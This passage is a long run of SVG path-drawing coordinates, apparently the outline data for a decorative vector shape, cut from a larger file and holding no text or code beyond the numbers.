c-8.3-.2-6.2-.8-1.9-.6-1.9-1,3.8-1.9-1.4-3.2,5.4-.1,5.3-.7,1.7-1.2a41.25,41.25,0,0,1,4.3.2c-1.9-.5,1.1-.5,3.7-.6-4.2-.5-4.8.3-7,0a13.65,13.65,0,0,1,5-.7c-.1-.8-5.1-2.5.1-3.1-5-.8-7.6-4.5,1.6-2.9.7-.7-2-1.7-2-2.2,1,.6.7-.2,5.7.1-1.5-.4-2.1-.4.9-.5-6.7-.2,1.7-.7-3.7-1.1.1.1-1,.1-1.4,0h8.3c3.9.4,1.1.4,3.5.8,4.8-.1,4.7.2,8.7.4-3.4-1.5-1.3-1.2.7-2.4-5.2-.2-1.3.5-5.2.4-.2-.2-.3-.4-.5-.6-2.6,0-4.7,0-5.5.1,5.2.1-.6.3,4.6.5-1.1.1-.7.4-5.4.2-.5-.2.9-.5-3.2-.5,1.3.3,2.5.6-.8.6-5.4-.7.6-2-5.4-3,4.6-.2,5.6-2.2-2-2.3,3.1-.2,2.2-.1,6.8-.2,1.8.4-2.1,1.1,3.9,1.3-1.4-.5-3.7-1.3,3.6-.7,0-.3-4.5-.4-4.7-.7,1.9,0,3.8.1,5.7.1.1.2.2,1.1,3.4.7-4.1-.3-.4-.7.6-.9-3-.3-4.9-1.5,2.9-1.5,1.6.1,2.3.2,3,.3-.1.4-3.7.8.9,1a58,58,0,0,1-7.1-.2c-.1.5,4.3.2,6,.5-2.8.1-5.6.2-.9.5,4.3-.2,7.2-2,1.7-2.8,5.5-.3-5.2-1.9,9.6-1.7-1.6-.3-1.3-.9,3.4-.9.7-.3-4.1-.3-3.3-.6,2.6-.6,8.2-.3,16.3-.4-7.9-.2-7.2-1-3.9-1.3a21.78,21.78,0,0,1,3,.3c4.5-.3-7.8-.8-.8-.9,4.4-.1,2.5.7,4.4.3-3.6-.5,4.1-.4-2.1-.8.7-.2,4.1-.1,5.4-.2-5.9-.4-6.3-2.4,3.9-1.9-6.5-2.2,6.1-4.8,5.3-6.6,2.7.1,6.1.2,6,.5-1.9,0-6.3,0-1,.4-.4-.2,1.2-.2,4-.1,2,.4-3.7.6.8.9.3-.3,1.7-1,1.7-1.3-1.5-.1-6.6-.2-8.8-.5,10.4.4.7-.4,5.1-.5,2.3.4,8.5.3,5.6,0,.1.3-4.7-.1-4.4-.2,1.2-.4,14.8-.2,9.1-.7-3.4-.1,1.2.5-4,.2-5.8-.3.3-.7.5-1-8.6-.4-11.4-1-9.7-1.5.7.5,2.7.3,7.3.4-.1-.7-2.1-1.2,2.7-1.7.5.2,0,1.1,2.1.8-2.1-.6,3.6-.5,6.8-.2-3.1-.6,2.5-.5-2.3-1,1.8,0,1.8-.1,4.2,0s3.4.3,3.2.5c5.9-.2,6.5-.3,10.6-.6-3.7-.2-4,.3-5.6,0,1.2-.4-3.4-.5-3.5-.8,6.7.2,3.8-.5,6.4-.6,6.4.6-4.8.8,2.5,1.3-.3-.3,1.6-.6,6.6-.4,1.1.3-1.1.8,2.19.9,2.2-.5-.69-1,8.9-.9-6.3-.3-.4-.9-5.4-1.4,2.7-.1,2.81.1,5.6,0-2.69-.4,4.8-.3.9-.5.1.3-4.69-.1-4.4-.2,3.6.1,2.5-.3,2.31-.6,4.4.2,4-.1,8.4.1-5.1-1.2,5.4-1.7,3.09-2.8,2,0,7.4.3,7,0-4.3-.3-5.8-.7-3.59-1a21.48,21.48,0,0,1,3,.3c2.91-.4-1.4-2.1,8.6-1.3-4.5-.5-8-1.6.2-1.3-1.3-.4-6.5-.2-7.3-.4,11.4-.8,2.1-2.3,8.8-3.2,6.2,1,4.4.1,5.3-.1-1.7-.3-2.3-.6-3.6-.9,0-.1-.4-.2-1.8-.4-.3-.1-.7-.1-1.1-.2.2,0,.4.1.6.1-.4,0-.7-.1-1.2-.1a31.52,31.52,0,0,1,4-.2l1.2.3a1.25,1.25,0,0,1-.6-.1c0,.3.1.6,2.4,1-.19-.2-.1-.2.1-.3a3.88,3.88,0,0,1,1.6,1,4.91,4.91,0,0,1-.5-.1c.2,0,.3.1.5.1a.79.79,0,0,1,.2.7h0c0,.1-.1.3-.1.4a5.54,5.54,0,0,0-1-.2c-3.2-.2.1.8-2.5.8a24.16,24.16,0,0,1,4.3.9c-3.1-.5-4-.2-1.8.4-2.1-.1-3.4-.7-5.2-.8,2.8.5,2.5,1.1,3.5,1.2,0-.1.2-.2,2,.1,2.1.5-.7.2.3.7,3.91.7,1.6-.2,3.91.1-.81.5,3.19.6,3.19.6,4.1,1-1.4.4-3.9,0,4.1.6,7.5,1.6,8.3,1.3-4.4-.9,1.7-.1-2.5-1.2a21.08,21.08,0,0,0,4.1.5c-2.2-.6-4.4-.5-5.4-1.1,1.4-.7,10.6,1.5,9.7,2.1,2.1.1,1.4,0,.7-.5,3.6,1,2.4.2,4,.3,1.3.4,1.1.6,1.3.9a5.08,5.08,0,0,1-.8.3,3.07,3.07,0,0,0-1-.2c.5.3.3.4,0,.5-.5.1-1.1.3-1.7.4,1.3.7,1.6,1.4,1.7,2-.2,0-.4-.1-.6-.1,1.5-.3-1.3,0-5.2-.9.3.2-.2.4,1.3.7.1-.7,2.5,1,4.2.8-2-.4-1.1-.4.4-.3a1.52,1.52,0,0,0,.1.6c-1.2,0-2.8-.1-3.1.2,1.5.3,2.6.5,3.3.7a3,3,0,0,0,.4.7h-1.09a10.53,10.53,0,0,0,1.4.3,5,5,0,0,0,1.1.7c-.7,0-2.91-.4-3.1-.3,4,.8-.1.4,3.4,1.1a19.63,19.63,0,0,0-2-.2,13.53,13.53,0,0,0-2.3-.7c-.91,0-1.1,0-.91.1-3.8.7,8.1,2.3-3.09,2.4a5.23,5.23,0,0,0-1.31-.1c-2.1-.4-1.69-.7-4.69-1.2a11.09,11.09,0,0,0,3.5,1.2c-.1-.2,1.8.2,2,.1a4,4,0,0,1-.5-.1c6.4.4,2,.5.5.9,3.9.2,6,.5,1.9.6,9.5.6,1.8-.5,3.19-1.1a9,9,0,0,0,3.1,0c.2.1.5.2.9.4.7-.1,4,1,5.5,1.4,1.1-.4-6.5-2.1-.69-1.6a12.16,12.16,0,0,0,4.3.9c-1.3-.4-2.8-.8-4.4-1.2-.9-.6,1.5-.4,2.69-.4-1.59-.3-3.8-.6-4.3-.8h.4c1.31.3,2.81.6,4.7,1,.8,1.5,4.6,3.6,1.8,5.2,10.7-.4-2.6-2.5,7-3.1,1.9.1,4.1.2,6.1.2.5.2.3.3,3.1.6-2.1-.1.4.5,1.3.9,1.5-.4,1.6-1,1.5-1.6a87.43,87.43,0,0,1,12.3-.9c-2.4-1.2,3.31-2.2,10.5-2.8-.8.3-1.8.5-.2,1-.09-.1.31-.2,1,.1.31.4-5.19-.7-5-.3,2.5.5,4.31.3,5.2.8-3.5-.3.1.2,1.3.7-2.19-.2-1.69.3-3.9-.1,7.5,2.1-1.3,1.5.2,2.5-3.9-.6-3.8-.2-4.9,0,3.9.7,1.7-.3,5,.3-1.4.8,3.8,3.1,7,4.6-2.8-.4-2.2-.6-4.3-.9-.6.3,4.1.9,4.5,1.3-4.3-.2-10.3-.5-3.3,1.2.1-.2-.6-.5.8-.3.1.3,5.7,2.1.8,1.7a39.85,39.85,0,0,1-4.4-1.1c1.4.2,1.8.1,1.9-.1-3.3-.5-2.9-.8-5.4-1.2-1.3.2,3,.7,2.4,1-2.9-.5-2.2-.6-4.2-.7,2.4.6,3.1,1.4,5.6,1.6-4.5-.5,2.4,1.6-2.4,1.2-2.7-.5,2.5-.2-2.4-.9-.6.1-.4.5.5,1,4.6.9-1-.4,2,.1,4.6.7,3.8,1.7,6.7,1.9-4.4-1.4.2-1.5-4-2.3,2.8.2,3.2-.2,6.9.3,0,.4.5.4,1.6,1.3-3.1-.4-10.1-.8-1.6.6-1-.6.7-.4,2.9-.1-2.3,0,3.5,1.1.4,1,4.6.7.8-.8-.6-1.2,1.3.2,1.5.4,3.2.6-2.5-1.8.9-2.1,4.6-2.7-5.4-.9-3.1.2-8-.6a8,8,0,0,0-1.2-.4c3.3.5,3.4.2,2.8-.3,3.6.6,4.4.5,6.1.7-7.1-1.7-3-2-1.1-2.3a20.39,20.39,0,0,1,2.2.6c1.2-.5.7-1-2.7-1.7,2.2.4-2.7-1.1.6-.7.7.2,3.4,1,4.2.8-3.2-.7-3.4-1.3-3.8-1.8a25,25,0,0,0,5.1.5c-1.8-.6-4.8-.6-6.4-1.2,4.1.4.3-.9,5.6-.4q-4.05-.6-3.3-.9c1.2.2,7,1.4,4.2.7-3.8-.5-3-1.3-.4-.8-.3.8,6.2,1.4,7.9,2.4a16.72,16.72,0,0,0-2-.2c-2.1-.3-1.5-.6-4.3-.9-.3.5-2.9,0,.4,1a25.83,25.83,0,0,1-5.1-.6c-.2.4,5.2,1.1,5.5,1.5s-1.6.1-.7.5c-1.1-.2-2.1-.4-3.1-.5,2.3,1-.2.2,3.5,1.4-1.2.2-4.2-.2-7.1-.6.8.4,5.8.9,6.4,1.3,0,.6,2.2,1.3-.4,1.3-1.7-.3-.7-.4-2.3-.7.1.2.2.3.2.5,3.4.6,3.1.3,5.3.9-3.4-1.8,2.9-1.7-1.6-3.5a45.32,45.32,0,0,1,5.2.8c-1-.7-1.8-1.3-3.3-.9a20.16,20.16,0,0,0-2.3-.8c4.6.8,5,.2,1.8-.3,3.7.6-2.4-.8.9-.2,3.3.4,2.8,1,4.6,1.7,2.9.1-1-1.3-1.9-2,4.7,1.2-.3-.9,2.7-.4,1.8.3,2.5,1.1,4.4,1.1-3.4-1-1.8-1.3-7-2.5,6.9.5-7.2-3.1,1.7-2.5-3.3-.7-1.8-1-.5-1.1,2.4.4-.2.6,4.4,1.2-.5-.5-2.1-1-4.6-1.5.2-.2,2.7.2,2.9,0-1.9-.3-3.9-1.2-2.4-1,1.2.2,1.2.4,1.2.5a10.4,10.4,0,0,0,4,.3c-1.6-.3-3.9-.6-4.3-.8a47.94,47.94,0,0,0,9.8.2c-5.3-.9,1.7-.4-4.5-1.3-.1.4,3.1,1.5-.8.4-2.4-.1,1.8,1-.6.8a15.24,15.24,0,0,1-2.1-.4c-.8-.7,5.2-.1,1.3-1.3-.1.1.3.4-.9.2a8,8,0,0,0-1.2-.4c.3-.2,4,.6,2.9,0-5.6-.6.1-1.1-7.9-2.4,3.8.4-.8-.3-.3-.7a19.35,19.35,0,0,0,2,.2c1.9.3,3.8,1.2,5.4,1.1-2.6-.5.1-.7-3.5-1.2.9.3-1.8.2-2-.1-1.3-.6,6.1.5,1.7-.6a5.55,5.55,0,0,1-2.1-.2c3.1,0,.8-.8,1.4-1.2a16.44,16.44,0,0,0,4.6,1.7c-1-.7.2-.7,2.7-.4-3.7-.7-5.3-.6-6.3-1.2,3.1.5.9-.5,3.9,0-3.6-.4-5.6-1.3-6.4-1.2,3.8,1-2.6-.4-2-.1,1.7.2,2,.9.3.6.3-.2-2.5-1.2-3.4-1.1,2.6.4.4.4-.9.2a4.69,4.69,0,0,1-.6-.2l1.2-.6a13.09,13.09,0,0,0,3.9.1c-1.6-.3-2.6-.4-3.4-.5.3-.2.5-.4.4-.7a11.17,11.17,0,0,0,2.7.8c-1.4-.8-2.1-1.9,1.1-1.7,1.4.9.6.9-1.4,1.1,5.7.9,6.9,1.3,12.8,2.5.6-.3-3.3-1.3-3.5-1.2-1.2.1,4.3,1.1,1.3.7-3-.6-4.9-1-5.5-1.5,3.4.3.5-.4,1.7-.6,4.2.9,2,0,4,.3,2.1.6.2.3.3.6,6.5,1-.1-.5-.4-.8,1.8.3,3.3.6,4.2.8a5.7,5.7,0,0,0-2.3-.8c-1.2.3-9.2-1.6-7.7-1.9a26.05,26.05,0,0,1,5.2.8c.1-.2-1.3-.5-1.3-.7,3.8.7,2.6,0,6.1.6-1.4-.7-.2-.6-3.5-1.2-3-.4-.1.4-1.9.1-1.6-.3-4-1.2-1.4-.9,3.4.6,5.6,1.2,6.2.8-5.4-.6-.8-.3-3.3-.9a41.57,41.57,0,0,1-7.2-.9c-.7-.8,1.5-.6,1.5-1,1.3.5,1.1.9,3.6,1.5,3.7.1-2.3-1.7,2.3-1.3-2.6.1,2.7.9,4.6,1.5,1.3-.1,3.3.7,4.1.6a16.33,16.33,0,0,1-4.4-1.1c3.3.5,4.5.1,7.1.7-1.6-.8-6.3-2.3.2-1.8,1.1.4-3-.1.2.5,0-.1.8,0,1.1.2.5.4-4.8-.9-3-.2,5.3,1,4.4,1.7,7,2.6-2.9-.6-1.9-.1-3-.2a11.42,11.42,0,0,1,3.1.8,3.7,3.7,0,0,0,1.1.1,5.44,5.44,0,0,1-1.1-.3c-.4-.1-.3-.1,0-.1.7,0,2.4.2,1.9,0a6.07,6.07,0,0,1-1.9-.5c-.3-.1-.2-.2,0-.3s1-.3,0-.7a4.76,4.76,0,0,0-.9-.3,3,3,0,0,1,.9.2,18.66,18.66,0,0,1,3.4.7c-.3,0-2.4,0,.2.5.2-.2,1.5-.2.7-.7-1.9-.3-2.5-.5-2.3-.7-.8-.1-1.4-.2-2-.3a14.26,14.26,0,0,1-3.4-.8c1.6.2,2.6.5,3.4.6s1.4.3,1.8.1c-.6-.1-1.2-.3-1.8-.4-3.5-.8-6.3-1.5-9.1-2.2,3.4.7,2.5.2,4.1.5a2.76,2.76,0,0,0,1.2.4c-1.3-.7,2.9.6,3.9.5h0c-6.8-1.3-1.7-.7-6.5-1.9,3.4.7,2.2.5,4.2.6.4.6.3.2,2.4.5.3,0,.5.1.8.1A8.44,8.44,0,0,0,880,5a16.62,16.62,0,0,0-2-.3q-.45,0,0,.3a5,5,0,0,0,1.2.3c.3-.2,5.5.8,6.3,1a20.88,20.88,0,0,0-5.8-2c.7-.4,1.3-.8,5.9.2.3.3-2.2-.1-2.9,0,2.8.9,3.8,1.6,5.9,2.2-1.8-.6,4.4.4,4.1.6-1.3.1-4.4.1-.7.7-5.8-.8-3.1.4-7.9-.3-.3.3,2.8.9,4.5,1.3-2.7-.4-1.5.2-2.9.1a19.45,19.45,0,0,0-5.1-.6c3.2.6-1.6.5,1.3.7a6.05,6.05,0,0,1,1.9,0c-.3.3,1.7.7,2.4,1.1,3.6.6,1.4-.3,6.1.7a2.68,2.68,0,0,1-1.8.3c-.7-.4-1.9,0-4.1-.5,1.6.7.2.6.6,1.2,5.6.9.4-.4,1.6-.7,8,1.3,6.8.2,13.1,1.1-1.2-.6-4.9-1.1-1.4-.9l-5.2-.9c-.3.3,3.3.8,2.4,1.1a8.82,8.82,0,0,1-2.9,0c-.5-.4-1.7-.7-2.6-1.3,3.7.7.9-.4,3.9.1-7.5-1.1-3.6.3-9.8-.3,1.4-.3,2.1-1,9.5-.3-.4-.3-1.7-.2-2.2-.5,1.1.2,1.2,0-.1-.2.6.3-2.5.1-3-.2,1.4-.1,1.4-.5,3.8-.3,2.2.4,1.2.6,3.4,1,.5-.1,1.4,0,1.9-.1-2.1-.4-6.9-1.5-3.4-1.1,1.9,1,1.7-.8,7,.5-.6-.4-3.5-.9-2.5-1.2,4.5,1,1.8.1,4,.3,2.2,1.6,4.5,3.7-2.5,2.9,1.2.9.6,1.1,1.8,1.7,1.4.2,2.3.4,3.2.6-.3-.4,4.5.5,5,.3-3.1-.4-5.1-.7-6.3-1,.7-.2-3.5-1.2-.4-.8,1.3.3,1.4.6,1.4.9,3.9.5,8.6.7,5.7-.3,0,.3.1.6-2.9.1.7-1.2-3.9-3.6,4.7-2.5.9.1,1.8.2,3,.4-4.1-.9,5.8.5.7-.7-1.1-.1-.1.4-3-.2a.74.74,0,0,0-.7-.3,9.16,9.16,0,0,1-2.5-.2c-.1-.2-.2-.5-.3-.7-4.5-.8-3.2,0-7.1-.6,3-.3,15.4.5,4.1-1.5a.26.26,0,0,0-.1-.2c2.5.3,4.5,1.1,5.2.9-1.6-.4-3.4-.7-3.4-1,4.7.8-1.1-.7,1.7-.5l2.4.7c2.5.9,2.4,1.6,1.9,2.1a9.18,9.18,0,0,1,2.2.6c4.2.9,5.2.4,7.3,1.1-2-.1-2-.2.2.4-2.9-.4-3.9-.2-3.7.3,5.7,1-.1-.4,2.9-.1,5.7,2.1-1,1.4,1.4,2.9,4.8,1,2.7,1.1,7.6,1.8-4-.5-6.4-.6-8.4-1.4-.8.2,3.2,1.3,4.5,1.3-.9-.3,2.8.7,3,.2a14.34,14.34,0,0,1,3.5,1.2c-1.9-.1-1.9-.4-5.2-.9-.4.4-.4.3.4.8,1.4.5,3.8.4,5.3,1a25.66,25.66,0,0,0-4.8,0c6.8,1.7,2.8,1.9,3.2,2.8-2.5-.5-7.1-1-4-.3,1.4.1,3.5.3,6.1.7-1.6.1-3.3-.1-.6.8-5.5-.9.3.6-3.8.1,1.6.3,5.4.8,5.3,1a.35.35,0,0,0,.1.2c-3.8-.6-5.1-1.1-8.5-1.6-1.3.2,4.7.8,3.4,1,3,.6,2.6.3,5.2.8-.8.4,3.2,1.6-1.3,1.3,4.1.8,2.2.8,3.5,1.2-.7.1-5.1-.9-4-.3,2,.3,2.4.5,4.2.8.1-.1.2-.2,2,.1,7.5,1.6,2.5,1.8,2.1,2.3-.1.1,5.3,2-1.8.4,1.2.5,2,1.1-2.8.2.5-.1,2.4.1,1.8-.4-3.1-.5-3.7-.9-6.5-1.4,1,.7-3-.7-1.9,0,.5.4,5.2.6,6.4,1.2a8.82,8.82,0,0,1-2.9,0c-.3-.2-2.4-.5-3.3-.8-.5.1-2.5.4-.6.8,1.8.2-.3-.6,1.8-.3s8.7,1.7,2.2.5c-.1.4,6.1,1.1,4.5,1.4a17.2,17.2,0,0,0-3.2-.5c.1.4,2.7.4,4.4,1.1a26.83,26.83,0,0,1-4-.3c3.2.9-1.8,1,4.6,1.5a2.68,2.68,0,0,1-1.8.3.17.17,0,0,1-.23.07.18.18,0,0,1-.07-.23l0,0a.16.16,0,0,1,.23,0h-.6c-.8-.2-1.6-.2-3.6-.6.2.2.3.3.3.4h-.3c-.9.2-.7.3,0,.4a6.32,6.32,0,0,1-1.3.4c2.5.6,3.8.3,4.2.7-2.7-.4,1.5.4.2.5-1.5-.2-3.9-.7-4.1-.6.3.5,2.4,1.4-1.5.9-.6-.3.9-.4-1.3-.8-2.9,0,3,1.3.6,1.2,1.4.2,2.8.5,4.2.7-.1.4,4.1,1.5-2.7.4,2.1-.1-3.8-1.5-7.7-1.9,0,.3.9.9-.6.8,1.5.5,3.1.3,4.2.8-1.6.1,4.4,2.1,2,2.2,2.1.2.6-.5,3.9.1,3.8,1.4-2.7,1.2-1,2.1a12.25,12.25,0,0,1,2.9-.1c1.6.8-1.6.7-1.2,1.6.1.2,1.9.4,2.2.6-.1.5-5.3.2-8.8-.2,7,1.3,6.3.5,9.1.7,2.7,1-2.8.3.6,1.3,1.6.2-.5-.6,2.9,0-2.1-1.3-5-2.8.8-2.4-1.8.4.8.4,3.5,1.2-.2.3-4,.2-2.7.6a5.85,5.85,0,0,1,2,.2c2.5.8-2.3.6.5,1-.2-.2.7-.2,1.9,0,2.7,1.4-1.9,1.2,3.2,2.6-7-1.1,1.5,1.9-5.4.9-.6-1.2.4-1.6-1.2-2.6-2.6-.2-2-.7-3.4-1.1-4.9-.2,1.3,1.7,3.1,2.5-1.3-.2-1.4-.1-3.1-.4.5-.3-2-.8-1.5-1.1-1.8-.2-5.6-.9-5.1-.5,2,.4,2.3.2,4.1.6a7.72,7.72,0,0,1,.4,1c-7-1-6.7-1.2-13.7-2.4,0-.1,1.3.1.9-.2a59.9,59.9,0,0,1-12-3c-2.9-.1,4.1,1.1,2.6,1.4a17,17,0,0,0-3.1-.5c3.3.5.7.7,4.4,1.2q-.45-.45,1.8-.3c.1.2,1.9.4,2.2.6,1.1.5-1.5.1-1.8.3a10.32,10.32,0,0,1,2.2.5c4.2.8-1.3-.6,4,.3,6.7,1.6,14.6,2.5,12.1,3.1-5.3-.6-2.6.3-1.4,1.1-1.4-.2-2.3-.4-3.2-.6-.3.2-2.8.7,1.7,1.5,2.3.4-1.5-.5-.3-.6,3.4.7,1.2-.2,4,.3,1.6,1.2-.5,1-5.7.3.4,1.1-2.3,1.2-2.7,2.6,2.5.6,3.8.3,4.2.7-1.7.1.8.6.5,1.1-1.6-.4-2.6-.6-3.1-.4,3.7,1-3.4,0,2.4,1.1-.3.2-3.2-.2-5-.4,1.4.4,3.9.8,5.4,1.1.5.3,0,.4-.8.4,1.4.4,3.9.8,5.4,1.1-1.1-.6,2-.1,3.9.1.5-.2-1.1-.5-1.4-.7.1,0,.2-.1.3-.1,1.3.2,2.6.4,4,.7.7.5-2.3.1,1.3.8,3.9.2-7.4-2-2.9-2-.5.5,2.8.6,4.4,1.1-.9-.8,9.8-.5,10.1.9,3.6.7,3.7.4,4,.2q-4.05-.6-3.3-.9c-1.9-.4-6.1-.9-6.4-1.2.7-.2,1.7-.4-1.5-1.1,4.7-1,1.1-3.8,2.2-5.6,1,.6,1,.6.4,1,6.1,1,2.7,1,3.5,1.2.9-.2,1.2.5,3.1.5,1,1-.8,1.4,4.2,2.8-.3-.9,6.7,1.5,6.2.8-6.4-1.5-5.3-2.1-1.9-2.1-1.2-.2-3-.5-3.2-.6,3.6.3,3.8,1.1,5.6,1.6A27,27,0,0,0,979,53c1.6.4,3.4.7,3.4,1-.8.3-2.1-.1-.7.7-1.4-.2-2.3-.4-3.2-.6-.1.3,2.5.8,2.4,1.1l-5.3-.9a31.71,31.71,0,0,1,8,2.7c1.6-.4,10.3.2,6.3-1.1,1.8.3,6.3.7,7.3,1.1-2.3.1-3.4-.1-.5.9-1.3-.2-1.5-.4-3.2-.6.4,1-7.2-.8-6.7.2a51.94,51.94,0,0,1,5.5,1.5c.5-.2,4.9.8,5.3,1-2.1-.1-2.7,0,1.2.4-2.3,0-.3,1.3-4.5.8-2.5-.4-3.2-.7-6.4-1.2-3.1-1.1-1.5-1.9-2.2-2.7a37.31,37.31,0,0,0-4.1-.5q3.45.6,3.3.9a52.82,52.82,0,0,1-5.3-.9c.3.3.5.6-1.8.3-.1-.2-.1-.3-.2-.5-5.2-.9-7.1-.4-5.7.2a12,12,0,0,1,3,.2c.3.2,1.8.5,2.3.7-.6.3-3.6-.5-5.1-.5,3,.7-2.3-.3-2-.1,1.6.4,3.4.7,3.4,1-1.6-.2-3.9-.7-4.1-.6,8.6,2.5-5.1.9,2.6,3.4a12.75,12.75,0,0,0-3.9-.1c3.9.6,5.7.7,9.3,1.2-.5-.6-1.4-1.8,3.3-1.2.3.3,2.6,1.1-.6.8,1.6.3,3.9.6,4.3.8-1.8.9,3.4,3.4-.1,3.9.2-.2,4.6.7,5.1.6-4.3-1.1-3.3-1.5.4-1.3-3.7-1.3-2.3-2.3-3.4-3.2,5.8.9,6.7.1,11.1,1,.5-.2-1.8-1.2.5-.9.4.4,3.5.9,4.5,1.3.8-.1,2.2-.1,1.6-.6,2.6.5,3.4.8,4.1.6-.7-1-2.6-2.4,3.8-2.3,6.1,1.2,2.8,1.4,4.9,2.1,1.9-.1,0,.5,2.3.8.1-.3,6.4.8,7.3,1.2-.8.1-2.4,0-6.1-.7.3.3.5.7,3.4,1.1-2.2-1,5.5.8,5.1.5a19,19,0,0,1-3.3-.9c6.1,1,.3-.5-1.5-1,3,.2-4.4-2.3,2.1-1.8,1.4.6,2.5,1,1.5,1.1,4.3.8,6.6,1.5,7.8,2.2-2-.1-2.1-.4-4.3-.8.6.4,6.7,1.9,1.5,1.3a9.61,9.61,0,0,0-3.4-1c3.3,1.2,9.9,2.8,10.3,3.5,1.8.3,3.2.5,4.1.6,2.1,1.4,8.2,3.5,2.3,2.9.9.5-.8.9,1.7,1.5.7-.3,5.8.6,4.9.1a66,66,0,0,0,6.7,2c-2.3-.3-1.5.2-1.8.5-.1.1-.3.1-.9.1a2.7,2.7,0,0,0-.8-.1c-1.2-.3.9-.4-1.5-.7-1.7,0-2.6.2-3,.6-1.1.9,1.1,2.6-3.2,2.7-3.2-.8,2.5-.5-2.7-1.6-2.3,0-.8.9-3.4,1-3.9-.6-4.7-1-4.5-1.3,6.2,1,2.3-1.1,10,.7-2.6-1-3.5-1.7.3-1.5-.1,0-.2-.1-.4-.1-1.1-.3-3.7-.7-3-.9a15.44,15.44,0,0,1,3.3.8c-4.8-1.4-1.7-2.9-7-4.6a37.91,37.91,0,0,0,4.1.5c-2.5-.5-3-.9-5.5-1.4,1.3.6-2,0-2.9.1,1.5.3,3.9,1.2,1.4.9s-1.3-.5-3.3-.9c-.2.1.1.2-.9.1a2.67,2.67,0,0,0-1.2-.4c-.1.5,6.8,2.3,1.8,1.7.9-.3-3.6-.8-4.4-1.2,2.2-.1-1.8-1.6-2.9-2,1.4.9-5.6-.4-6.9-.1-1.7-.7,2.8.2,1.8-.3a49.24,49.24,0,0,0-10.2-1.1c.6-.2-2.3-.6-3.3-.9-1.5,0,.3,1-5-.3-.2.3,1.6,1.1-1.7.6-2.3-.6-.1-.9-4.6-1.7,13.3,4.2-14.6.3-5,3.7-5-1-4.5-.5-6.1-.6-3.9-.8-6.9-1.6-9.8-2.4,1.9.1,0-.3-.3-.6,1.7,0,4.1.7,4,.3-1.8-.3-3.2-.5-4.1-.6-.8-.6.6-.6,1.4-1.2-3.6-.8-3.7-1.1-7.5-1.6,1.8,1.1-2.2.7,3,2.3-2.3-.7-10.8-1.5-5-.3.1-.2-.6-.5.8-.3,1.6.3,3.8.6,4.2.8-.8.3,3.6,1.4-1.7.5,1.3.1,1.2-.2-1.3-.7.1.4-1.9-.3-3-.2,2.9.8,3.6,1.8.7,1.6-1.1-.2-2.1-.3-3.1-.5,2-.2-7.3-2-2.4-.9-2.4.4,6.9,2.3,10.1,3,.6.4-3.9-.5-4-.3,4.8.8,5.1,1.5,7.8,2.2-.5-.3,3.7.2,4.1.6-1.8.4,1,2.2-2.9,2.1-1.9-.4-3.4-.9-4.2-.7,7.2,1.2-1.6.7,1.7,1.5,3.6.7,1.1-.3,5.1.5-.5.3,1.6.7,3.4,1.1a13.75,13.75,0,0,1,2.2.6c-3.6-.1-2.1,1.5.1,2.4,3.5.4-1.5-.9,2.8-.3,2.2.5,6.6,1.2,8.6,1.8-1.2,0,.8.9,2.6,1.4a6,6,0,0,1,4.1.6c1.6-.7-2.4-1.9-1.2-2.7a39.56,39.56,0,0,1-4.3-.9c1.8.2-.3-.6,1.8-.3,3.7.6,1.6.9,5.6,1.6.7-.2-4-2,1.5-1l-.3-.6c-7.3-1.2-4.1-2.1,1.6-.7.8-.4-1.4-1.6,4.6-.6-2,.3-1.3,1,2,2.1.3-.2,2.9.3,1.8-.3-2.8-.4-2.1-.6-3.3-.9,2.4.4.8-.4,2.9-.1,3.4.7,3.2.3,5.1.6,3.3,1.1-.7,1-1.3,1.3,4.1.7.6-.5,3.9,0,1.7.3.7.4,2.3.7,2.3.3-.9-.9,1.6-.6,1.5.5,1.1.9,4.6,1.5a32.09,32.09,0,0,1-4.7.2c3.7.4,4.6,1.3,10.8,2.5-4.2-1.2-9.4-2.9-1.9-2.1-1.6-.8-2.3-1.8,1.2-1.6a38,38,0,0,0,5.6,1.6c4.4.5-3.5-1.4-.6-1.3.2.2.4.3,2.2.6.1-.3-2.2-.7-3.4-1.1a31.24,31.24,0,0,1,7.2,1c-3.5.8.5,2.7-5.3,3.1-2.3-1.3,5.4-.9-2.2-2.6,3,1-2.9.2,1.6,1.3-1.6.2-6.2-.5-3.7.4-1.1-.6,2.7.3,3.1.5-1,.2-1.1.1-1.7.5,5.6,1,3,1.6,9,2.6-6.5-2.2.5-2.1,4.7-2.3-1.7-.6-4.2-.5-5.3-1a12,12,0,0,1,3,.2c5.3,1.2,3.9.6,9.3,1.2,2,1-4.8-.4-4.9,0,.7.4,5.4,1.6,3.6,1.5a21,21,0,0,1-2.2-.6c-.5.1-1.4,0-1.9.1a24.16,24.16,0,0,1,4.3.9c-5.2-.8-8.7-1.1-9-.6,1.8.3,2.6.3,3.2.5-2.2,0-1.9.7-4.6.6,3.5.8.1.5,2.6,1.3-4.8-.8.8,1.1-3.7.4.8.2,1.3.3,1.2.4,10.3,1.9,2.8-1,8.5-.4-.4.6,2.4.8,3.2.6,5.6,1.8-7.7.5-1.2,1.7-.2.2-5.5.1-2.7.4,1.5-.3.8,0,5.2.8,2.2.3-2.6-1.1.6-.8,1.5.3,1.1,1,2.3.8-.9-.6-.1-.5-2.5-1.2,1.1,0,3.9.5,5.1.5-.9-.3-5.1-.8-4.4-1.1,11.2,1.7,4.3-.9,9.4-.7,3.9,2.2,1,3.2,2.1,4.5a6.26,6.26,0,0,1,2.1.4c.1.1.1.2.2.4-2.4-.4-4-.7-5.2-.8,2.6.9-2.2.1-2.7.4,2.9,1.3,1.2,3.2-1.3,3.5-.3.5,2.1,2.8-4.8,2.2,1.6.3,3.9.6,4.3.8a23.15,23.15,0,0,0-4.1,1.5c1.4.3,4,.6,4.2.8-.9.1-3.8-.4-5-.4,6.8,1.7-3.7.7,1,2.2,5.1.7,1.4-.3-.2-.5a2.7,2.7,0,0,1,1.8-.3c.1.5,1.6.3,3.1.5,1.3.4,1.3.5.2.5,8.3,1.4.4-1.1.2-1.6s7.8,1,6.9.3a15,15,0,0,0-3-.3c-1.6-.8-3.9-1.8.3-1.4.9.5,4.4.8,4.1.5-2.6-.6-1.2-.6-3.6-1.4,5.1,1.1.6-.6,6.2.8-.3-.6-3.1-.7-4.5-1.3,4.2.4-.8-.1-1.3-.7a20.19,20.19,0,0,1,4.1.6c.5-.5-2.8-1.5-.7-1.6-1.5-.4-3.3-.7-4.4-1.1,1.1-.3,2.3-.5,1.3-1.3,8,1.4,6.8-.5,12.6,0-1.07-.15-2.14-.35-3.2-.6.2-.3,6.1.8,2.9-.1-3.6-.7-1.1.3-5.1-.5-1.3-.8-4.5-2.4-2.2-2.6-1.1.2,4,1.3,4.4,1.2-1.7-.6-